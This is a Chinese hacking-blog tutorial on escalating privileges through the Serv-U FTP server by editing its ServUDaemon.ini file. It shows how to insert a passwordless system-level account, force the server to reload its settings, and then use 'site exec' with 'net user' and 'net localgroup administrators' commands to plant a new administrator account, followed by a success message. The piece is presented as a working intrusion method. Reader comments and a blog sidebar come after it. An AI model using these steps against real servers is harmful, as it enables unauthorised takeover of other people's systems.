首页 » 系统攻防 » Windows » 浏览内容

SERV-U提权之修改目录文件提权

385 4 发表评论

前面讲过SERV-U弱口令提权服务器,这种方法只局限于serv-u的默认帐号密码没有修改的情况下来进行提权。

详细大家可以参考前面的文章 服务器提权之Serv-U弱口令提权

可是这种方法如果管理员修改了默认的帐号密码那么我们就没有办法来进一步进行提权了。

所以这篇文章主要就是针对serv-u的帐号密码被修改过后。来重新添加或者修改serv-u的帐号和密码。

但是这种方法现在已经不太好使了。因为需要满足一下条件。

serv-u目录文件有修改权限

需要知道Serv-u的路径 

默认路径C:Program FilesRhinoSoft.comServ-U

在的管理员的安全意识在逐渐的增强。对系统权限的设置也越来越严格了。

但是一样还是存在有很多这样的漏洞。就像 不是还有很多管理员密码是admin  123 这些么。。。 

我们需要修改serv-u目录下的ServUDaemon.ini文件 这是存储帐号密码的地方。 也相当于是serv-u的数据库把。。

找到 ServUDaemon.ini 里面这样类型的代码 然后进行添加或修改。

[USER=admin|1]
Password=7a57a5a743894a0e
HomeDir=D:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600
Access1=D:|RWAMELCDP

比如我们要添加一个帐号为123 密码为空的usev-u帐号就这样填写。

[USER=123|1]
Password=
HomeDir=c:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600

Maintenance=System  //权限类型多加一行指定新加帐号为系统管理员
Access1=c:|RWAMELCDP

然后就变成了。

[USER=admin|1]
Password=7a57a5a743894a0e
HomeDir=D:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600
Access1=D:|RWAMELCDP

[USER=123|1]
Password=
HomeDir=c:
RelPaths=1
PasswordLastChange=1292736176
TimeOut=600

Maintenance=System
Access1=c:|RWAMELCDP

ReloadSettings=True  //在修改ini文件后需加入此项,这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加


记得修改后后还需要在[USER=admin|1]的后面一行加上 user2=123|0  意思的在原有帐号的基础上在添加一个帐号为123的用户。
全部完成后点击保存即可用现在的serv-u帐号来添加管理员帐号密码了。
Quote site exec net user heishou 123456 /add
 Quote site exec net localgroup administrators heishou /add
 200 EXEC command successful (TID=33). // 执行成功

标签:

评论 共 4 条 (RSS 2.0) 发表 评论

  1. 会员头像 admin说道:

    @左泪 http://www.exehack.net/757.html 看这篇文章

  2. 会员头像 按摩椅品牌说道:

    来了解诶下了哦

  3. 会员头像 左泪说道:

    那么如果说目录也没有修改权限的时候怎么解决?

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1480 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:25 个
  • 建站日期:2011-02-13
  • 运行天数:2125 天
  • 最后更新:2016-12-6

订阅博客